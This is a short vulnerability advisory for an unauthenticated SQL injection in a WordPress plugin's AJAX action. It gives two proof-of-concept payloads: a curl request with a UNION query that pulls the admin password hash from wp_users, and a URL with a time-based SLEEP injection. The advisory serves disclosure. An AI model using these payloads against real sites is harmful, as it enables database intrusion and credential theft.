The plugin does not properly sanitise and escape some parameters before using them in SQL statements via an AJAX action, leading to SQL Injections exploitable by unauthenticated users
v < 3.64: curl http://example.com/wp-admin/admin-ajax.php --data 'action=get_semadata&type=attributes&catid=-3 UNION ALL SELECT 1,2,3,(SELECT user_pass FROM wp_users WHERE ID = 1),5-- -' v < 4.02 https://example.com/wp-admin/admin-ajax.php?action=get_semadata&type=deleteattribute&catid=1&attrids=1%29 AND %28SELECT 42 FROM %28SELECT%28SLEEP%285%29%29%29b
cydave
cydave
Yes
2022-04-13 (about 2 months ago)
2022-04-13 (about 2 months ago)
2022-06-01 (about 1 months ago)